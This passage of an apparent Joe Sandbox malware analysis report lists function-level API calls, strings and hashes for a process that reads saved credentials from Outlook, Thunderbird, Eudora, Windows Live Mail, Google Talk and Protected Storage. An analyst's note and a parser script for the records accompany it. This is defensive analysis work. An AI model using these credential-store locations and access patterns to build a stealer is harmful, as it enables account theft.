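        findings = triage(rec)
        if findings:
            result[f"proc {rec.process} @ {site}"] = findings
    return result


if __name__ == "__main__":
    for key, findings in triage_report(SAMPLE_REPORT).items():
        print(key, "->", "; ".join(findings))
```

Records are keyed by the first call site that is not inside a subcall, because the report does not print a function start address outside the control-flow graph text. Calls marked "Part of subcall function" are kept in the record deliberately: the LoadLibraryW that pairs with the GetProcAddress here lives in the callee 0040A804, and dropping subcall lines would hide the dynamic-import pattern.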
Control-flow Graph
• Function 407c87-407d1e (rendered graph; branches to FindFirstFileA at 407c92-407cb1 or FindNextFileA at 407cb3-407cc7, calls 407d1f and 406e81, strlen * 2 at 407cd5-407d03, exit at 407d18-407d1e)
APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
• FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
• strlen.MSVCRT ref: 00407CEB
• strlen.MSVCRT ref: 00407CF3
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                          • String ID: .8D
                                                                                                                                                                                                          • API String ID: 379999529-2881260426
                                                                                                                                                                                                          • Opcode ID: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                                          • Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph (rendered graph image not reproduced)

APIs
• memset.MSVCRT ref: 00401E82
• strlen.MSVCRT ref: 00401E9B
• strlen.MSVCRT ref: 00401EA9
• strlen.MSVCRT ref: 00401EEF
• strlen.MSVCRT ref: 00401EFD
• memset.MSVCRT ref: 00401FA8
• atoi.MSVCRT ref: 00401FD7
• memset.MSVCRT ref: 00401FFA
• sprintf.MSVCRT ref: 00402027
  • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
• memset.MSVCRT ref: 0040207D
• memset.MSVCRT ref: 00402092
• strlen.MSVCRT ref: 00402098
• strlen.MSVCRT ref: 004020A6
• strlen.MSVCRT ref: 004020D9
• strlen.MSVCRT ref: 004020E7
• memset.MSVCRT ref: 0040200F
  • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
  • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
• _mbscpy.MSVCRT ref: 0040216E
• RegCloseKey.ADVAPI32(00000000), ref: 00402178
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 00402193
  • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
• String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
• API String ID: 1846531875-4223776976
• Opcode ID: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
• Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
• Opcode Fuzzy Hash: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
• Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph image not reproduced)

APIs
  • Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
  • Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
  • Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000), ref: 00404AD9
  • Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
• ??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
• DeleteObject.GDI32(?), ref: 0040CEC8
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
• String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
• API String ID: 745651260-375988210
• Opcode ID: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
• Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
• Opcode Fuzzy Hash: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
• Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph image not reproduced)

APIs
  • Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
• LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
• _mbscpy.MSVCRT ref: 00403E41
Strings
• Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
• pstorec.dll, xrefs: 00403C1D
• www.google.com/Please log in to your Google Account, xrefs: 00403C87
• Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
• Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
• Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F
• www.google.com/Please log in to your Gmail account, xrefs: 00403C73
• Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
• Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
• www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
• PStoreCreateInstance, xrefs: 00403C31
• www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc_mbscpy
• String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
• API String ID: 1197458902-317895162
• Opcode ID: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
• Instruction ID: 8c3092e028ed30b7bcb0bf0438431f6e947b4810b401e401bf51def59c6c6aaf
• Opcode Fuzzy Hash: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
• Instruction Fuzzy Hash: 5C51A571600615B6E714AF71CD86FEAB76CAF00709F20053FF904B61C2DBBDBA5486A9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph image not reproduced; basic blocks 40f478-40f5b5, with calls to RegOpenKeyExA, RegQueryValueExA, RegCloseKey, LocalFree, memcpy and to functions 4446d0, 40472f, 4047a0 and 40f177)

APIs
• RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
• RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
• RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
• RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
  • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
  • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
• memcpy.MSVCRT ref: 0040F55C
• memcpy.MSVCRT ref: 0040F571
  • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
  • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
  • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
  • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                                          • API String ID: 2768085393-888555734
                                                                                                                                                                                                          • Opcode ID: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                          • Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 249 44412e-44414a call 44431c GetModuleHandleA 252 44414c-444157 249->252 253 44416b-44416e 249->253 252->253 254 444159-444162 252->254 255 444197-4441e4 __set_app_type __p__fmode __p__commode call 444318 253->255 256 444164-444169 254->256 257 444183-444187 254->257 264 4441e6-4441f1 __setusermatherr 255->264 265 4441f2-44424c call 444306 _initterm __getmainargs _initterm 255->265 256->253 259 444170-444177 256->259 257->253 260 444189-44418b 257->260 259->253 262 444179-444181 259->262 263 444191-444194 260->263 262->263 263->255 264->265 268 44424e-444256 265->268 269 444288-44428b 265->269 270 44425c-44425f 268->270 271 444258-44425a 268->271 272 444265-444269 269->272 273 44428d-444291 269->273 270->272 274 444261-444262 270->274 271->268 271->270 275 44426f-444280 GetStartupInfoA 272->275 276 44426b-44426d 272->276 273->269 274->272 277 444282-444286 275->277 278 444293-444295 275->278 276->274 276->275 279 444296-4442aa GetModuleHandleA call 40cc66 277->279 278->279 282 4442b3-4442f3 _cexit call 444355 279->282 283 4442ac-4442ad exit 279->283 283->282
APIs
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
• String ID:
• API String ID: 3662548030-0
• Opcode ID: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
• Instruction ID: fc298a0057bb7b157c7d5bb9a283569fada43ed9a32b195ba4478b44b5386df1
• Opcode Fuzzy Hash: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
• Instruction Fuzzy Hash: 9E419F74D00714DFEB209FA4D8897AE7BB4BB85715F20016BF4519B2A2D7B88C82CB58
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• memset.MSVCRT ref: 004437F8
  • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
  • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
  • Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351
  • Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
  • Part of subcall function 0041072B: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
  • Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7
• memset.MSVCRT ref: 00443866
• memset.MSVCRT ref: 00443881
  • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
• ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
• strlen.MSVCRT ref: 004438C8
• _strcmpi.MSVCRT ref: 004438EE
Strings
• Software\Microsoft\Windows Live Mail, xrefs: 00443897
• \Microsoft\Windows Mail, xrefs: 00443816
• \Microsoft\Windows Live Mail, xrefs: 0044383D
• Store Root, xrefs: 00443892
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
• String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
• API String ID: 832325562-2578778931
• Opcode ID: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
• Instruction ID: 024f477f45f6e85a7703d2448ebd5bdc30730893e4efb81a5a52e1788c76f972
• Opcode Fuzzy Hash: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
• Instruction Fuzzy Hash: 723166B2508344AAF320FB99DC47FCB77DC9B88715F14441FF648D7182EA78964487AA
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 308 40edd5-40ef32 memset * 2 call 407649 * 2 RegOpenKeyExA 313 40ef38-40ef5f RegQueryValueExA 308->313 314 40f04e-40f054 308->314 315 40f045-40f048 RegCloseKey 313->315 316 40ef65-40ef69 313->316 315->314 316->315 317 40ef6f-40ef79 316->317 318 40ef7b-40ef8d call 404666 call 40472f 317->318 319 40efec 317->319 328 40efdf-40efea call 404780 318->328 329 40ef8f-40efb3 call 4047a0 318->329 320 40efef-40eff2 319->320 320->315 322 40eff4-40f034 call 4012ee RegQueryValueExA 320->322 322->315 330 40f036-40f044 322->330 328->320 329->328 335 40efb5-40efb8 329->335 330->315 336 40efd6-40efd9 LocalFree 335->336 337 40efba-40efcf memcpy 335->337 336->328 337->336
APIs
• memset.MSVCRT ref: 0040EEDC
• memset.MSVCRT ref: 0040EEF4
  • Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669
• RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C
  • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
  • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
  • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
• memcpy.MSVCRT ref: 0040EFC7
• LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
• String ID:
• API String ID: 2012582556-3916222277
• Opcode ID: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
• Instruction ID: 747b8e804c7bbb21ad1dd8da88f93546a58f2d2a8080c646c51fe7008e5948b4
• Opcode Fuzzy Hash: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
• Instruction Fuzzy Hash: 83811E618087CB9ECB21DBBC8C445DDBF745F17234F0843A9E5B47A2E2D3245A46C7AA
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 338 4037bc-40380e memset * 2 call 443a35 341 4038d4-4038d7 338->341 342 403814-403874 call 4021ad call 406ca4 * 2 strchr 338->342 349 403876-403887 _mbscpy 342->349 350 403889-403894 strlen 342->350 351 4038b1-4038cf _mbscpy call 4023d7 349->351 350->351 352 403896-4038ae sprintf 350->352 351->341 352->351
APIs
• memset.MSVCRT ref: 004037DD
• memset.MSVCRT ref: 004037F1
  • Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
  • Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
  • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
  • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
• strchr.MSVCRT ref: 00403860
• _mbscpy.MSVCRT ref: 0040387D
• strlen.MSVCRT ref: 00403889
• sprintf.MSVCRT ref: 004038A9
• _mbscpy.MSVCRT ref: 004038BF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                          • String ID: %s@yahoo.com
                                                                                                                                                                                                          • API String ID: 317221925-3288273942
                                                                                                                                                                                                          • Opcode ID: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                                          • Instruction ID: 0355cd0d48ae578dfdfe4a6cbfa0b9af13deca75d91fcedaec1ea3361aee035e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0215773D0412C5EEB21EA55DD41BDA77ACDF45308F0000EBB648F6081E6789F588F55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

[Graph rendering not reproduced. Function 004034D6-00403574; basic blocks call memset (x2), sub_410493, _mbscpy, sub_406AF3, _mbscat and sub_4033E2.]
APIs
• memset.MSVCRT ref: 004034F6
• memset.MSVCRT ref: 0040350C
  • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
• _mbscpy.MSVCRT ref: 00403547
  • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
  • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
• _mbscat.MSVCRT ref: 0040355F
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: _mbscatmemset$Close_mbscpystrlen
• String ID: InstallPath$Software\Group Mail$fb.dat
• API String ID: 3071782539-966475738
• Opcode ID: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
• Instruction ID: 06cca456285af6d778403e239192c4ceeddf5a100a2cf1fec545289e95a886a3
• Opcode Fuzzy Hash: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
• Instruction Fuzzy Hash: 6901F07294412866EB20F2658C46FCB7A5C9B65705F0000B7BA49F20C3D9F86BD486A9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Graph rendering not reproduced. Function 0040C9F7-0040CAF9; basic blocks call ??2@YAPAXI@Z (operator new, x2), sub_40400D, DeleteObject, sub_406E26, sub_4019B4 (x2), memset, LoadIconA and _mbscpy.]
APIs
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ??2@$DeleteIconLoadObject_mbscpymemset
• String ID:
• API String ID: 2054149589-0
• Opcode ID: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
• Instruction ID: 30546b7ffc0c4dd123ee27c8339ba671db17b069e44cca125f5e111fbf26b461
• Opcode Fuzzy Hash: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
• Instruction Fuzzy Hash: D22190B5900324DBDB10EF648CC97D97BA8AB44705F1445BBEE08EF296D7B849408BA9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
  • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
  • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
  • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
  • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
  • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
  • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
  • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
  • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
  • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
  • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
• memset.MSVCRT ref: 00408392
  • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
• memset.MSVCRT ref: 004083E3
• RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
• RegCloseKey.ADVAPI32(?), ref: 00408448
Strings
• Software\Google\Google Talk\Accounts, xrefs: 00408363
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
• String ID: Software\Google\Google Talk\Accounts
• API String ID: 2959138223-1079885057
• Opcode ID: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
• Instruction ID: c6fde65740424625f6a31d6a262b66ef11e3a8462d59295f471bfbb40e3c967b
• Opcode Fuzzy Hash: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
• Instruction Fuzzy Hash: 5E2183B100824AAED610DF51DD42EABB7DCEF94344F00043EFA84911A2F675DD5D9BAB
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Graph rendering not reproduced. Function 0040B783-0040B864; basic blocks call sub_406A00, sub_407BAF (x2), _mbsicmp, sub_40B340, sub_410411, sub_404780, sub_403C03, sub_410166, sub_40472F, sub_407BBF, qsort and SetCursor.]
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: Cursor_mbsicmpqsort
• String ID: /nosort$/sort
• API String ID: 882979914-1578091866
• Opcode ID: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
• Instruction ID: 59731eef90b6f0024c6c95bb6f71fb6a55e53d5caa10bc7ba91746e522f0a21b
• Opcode Fuzzy Hash: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
• Instruction Fuzzy Hash: AF21C4B1704501EFD719AB75C880AA9F3A8FF88314F21013EF419A7292C738B8118B99
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (drawn as an image on the original page; legend: Executed / Not Executed). Basic blocks and edges recovered from the graph data, listed as "node: address range, calls -> successors":
• 445: 41072b-410742, call 41067e -> 448, 449
• 448: 410744-41074d, call 406e4c -> 458, 459
• 449: 41076d-41078b, memset -> 450, 451
• 450: 410797-4107a5 -> 454
• 451: 41078d-410790 -> 450, 453
• 453: 410792-410795 -> 450, 456
• 454: 4107b5-4107bf, call 410411 -> 463, 464
• 456: 4107a7-4107b0 -> 454
• 458: 41074f-410752 -> 449, 461
• 459: 41075e-410761 -> 462
• 461: 410754-410757 -> 449, 465
• 462: 410768 -> 466
• 463: 4107c1-4107e9, call 4106ad, call 410452, RegCloseKey -> 464
• 464: 4107ef-410802, _mbscpy -> 466
• 465: 410759-41075c -> 449, 459
• 466: 410805-410807
APIs
  • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
  • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
• memset.MSVCRT ref: 00410780
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
• _mbscpy.MSVCRT ref: 004107F7
  • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 889583718-2036018995
• Opcode ID: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
• Instruction ID: 55274f9b0d4144c5a5f6b064647028c43f69cf0431b3c32ec78c32e38a1c383e
• Opcode Fuzzy Hash: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
• Instruction Fuzzy Hash: 2811D071C00218FBEB24F6948C85EEF77AC9B15304F1400B7F95161192E6B99ED4CA99
Uniqueness

Uniqueness Score: -1.00%

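The records on this page are Joe Sandbox's per-function metadata for the code dumped from process 5 (snapshot hcaresult_5_2_400000_wab.jbxd). The fields an analyst carries to other reports are "API String ID" and "Instruction Fuzzy Hash", which identify the same function across samples regardless of relocation, while the "APIs" bullets give the exact call sites (the "ref" addresses) to break on in a debugger. The parser below is an added example and is not part of the Joe Sandbox report or any Joe Sandbox tooling; the function names parse_records, api_index and similarity_pivots are my own, and the sample text is constructed from two of the records on this page (the Shell Folders lookup and the resource loader). It assumes the layout exactly as rendered here: bullet lines under fixed section headers, with one "Uniqueness Score" line closing each record.

```python
"""Parse Joe Sandbox per-function records (as rendered on this page) into dicts.
Added example, not part of the Joe Sandbox report or its tooling. Assumes the layout
shown here: bullets under fixed headers, one "Uniqueness Score" line per record."""
import re

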